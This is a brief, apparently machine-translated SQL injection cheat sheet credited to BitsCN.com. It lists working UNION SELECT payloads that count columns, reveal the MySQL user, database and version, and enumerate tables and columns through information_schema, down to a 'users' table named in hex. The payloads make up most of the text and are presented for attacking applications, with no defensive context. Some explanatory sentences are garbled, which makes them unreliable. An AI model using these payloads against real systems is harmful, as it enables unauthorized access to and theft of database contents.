MYSQL injection statement
MYSQL injection statement
Only the role type is used.
Order by XX
Union select .....
1 'Union SELECT 1, CONCAT (user (), 0x3a, database (), 0x3a, version () # The two statements are equivalent.
1 'Union SELECT 1, CONCAT_WS (CHAR (58), user (), database (), version ())#
The above is character-type, the Annotator is #, and CONCAT_WS is the character separated by a separator.
Obtain database and other information
1 'Union SELECT 1, concat (table_name) from information_schema.tables where table_schema = database ()#
Concat generation is only a string connection. you can also output all tables. Table_name and table_schema are fields in the tables table in information_schema.
1 'Union SELECT 1, concat (column_name) from information_schema.columns where table_name = 0x7573657273 #
0x7573657273 is the hexadecimal representation of users. This users is just a special case. Query based on the field values in the table obtained above. Here, the database knows, the table knows, and the table field knows. The rest will not be checked. Perform union query directly.
Table tables in information_schema has two main fields: table_schema (database name) and table_name (table name ).
Columns in information_schema has two main fields: table_name (table name) and column_name (column name ).
It doesn't matter if only one order by statement can be displayed. You can use concat
For example, concat (field, 0x3a, field) displays two fields. The one in the middle is: hexadecimal representation.
BitsCN.com